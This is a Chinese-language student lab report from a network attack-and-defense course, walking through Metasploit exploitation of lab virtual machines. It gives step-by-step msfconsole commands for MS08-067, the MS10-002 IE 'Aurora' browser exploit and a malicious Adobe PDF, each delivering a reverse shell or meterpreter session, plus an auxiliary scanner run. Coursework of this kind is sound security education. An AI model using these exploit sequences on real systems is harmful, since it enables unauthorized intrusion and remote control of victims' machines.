20192406梁健 2021-2022-2 《网络与系统攻防技术》实验六实验报告
1.实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1 一个主动攻击实践,尽量使用最新的类似漏洞;
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
1.4 成功应用任何一个辅助模块。
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除1分。
2.实验过程
1.1 一个主动攻击实践,尽量使用最新的类似漏洞;
漏洞:MS08_067
攻击机: Win10 (IP:192.168.0.101)
靶机:Win2kServer (IP:192.168.192.130)
在Win输入msfconsole进入控制台后依次输入以下指令:
采用默认LHOST:192.168.0.101,默认端口LPORT:4444,默认目标target:0
msf6 > use exploit/windows/smb/ms08_067_netapi
msf6 exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp
msf6 exploit(ms08_067_netapi) > set RHOST 192.168.192.130
msf6 exploit(ms08_067_netapi) > exploit
1.2 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
漏洞:MS10_002
攻击机: Win10 (IP:192.168.43.182)
靶机:WinXP (IP:192.168.192.131)
在Win10输入msfconsole进入控制台后依次输入以下指令:
msf6 > use exploit/windows/browser/ms10_002_aurora
msf6 exploit(windows/browser/ms10_002_aurora) > set srvhost 192.168.43.182
msf6 exploit(windows/browser/ms10_002_aurora) > set uripath \admin
msf6 exploit(windows/browser/ms10_002_aurora) > set Lhost 192.168.43.182
msf6 exploit(windows/browser/ms10_002_aurora) > set Lport 4444
msf6 exploit(windows/browser/ms10_002_aurora) > exploit
结果:Using URL: http://192.168.43.182:8080/admin
在靶机IE浏览器中和输入URL并转到
成功反弹连接,输入ipconfig命令查看靶机信息
1.3 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
漏洞:adobe_cooltype_sing
攻击机: Win10 (IP:192.168.43.182)
靶机:WinXP (IP:192.168.192.131)
在Win10输入msfconsole进入控制台后依次输入以下指令:
msf6 > use windows/fileformat/adobe_cooltype_sing
msf6 exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(adobe_cooltype_sing) > set LHOST 192.168.43.182
msf6 exploit(adobe_cooltype_sing) > set LPORT 4444
msf6 exploit(adobe_cooltype_sing) > set FILENAME 20192406.pdf
msf6 exploit(adobe_cooltype_sing) > exploit
在Win10输入msfconsole进入控制台后依次输入以下指令:
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.43.182
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit
在靶机中打开pdf文件
成功反弹连接,输入ipconfig命令查看靶机信息
1.4 成功应用任何一个辅助模块。
辅助模块:scanner/http/backup_file
攻击机: Win10 (IP:192.168.43.182)
靶机:WinXP (IP:192.168.192.131)
在Win10输入msfconsole进入控制台后依次输入以下指令:
msf6 exploit(multi/handler) > use scanner/http/backup_file
msf6 auxiliary(scanner/http/backup_file) > set rhost 192.168.192.131
msf6 auxiliary(scanner/http/backup_file) > run
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
查看辅助模块信息和执行成功显示
3.问题及解决方案
- 问题1:在利用MS10_018攻击浏览器时无法成功。
- 问题1解决方案:换成MS10_002就成功了。
- 问题2:在攻击Adobe时无法成功。
- 问题2解决方案:后发现是版本太高,改成低版本的就可以成功了。
4.学习感悟、思考等
实验主要掌握三种不同的MSF漏洞攻击应用,即主动攻击、针对浏览器的攻击和针对客户端的攻击.本次实验难点主要在靶机的版本上,由于每个攻击版本要求不同,每次攻击时都需要下不同的镜像还有软件,比较费时费力。不过最终还是在比较简单的层面实现了所有的小项。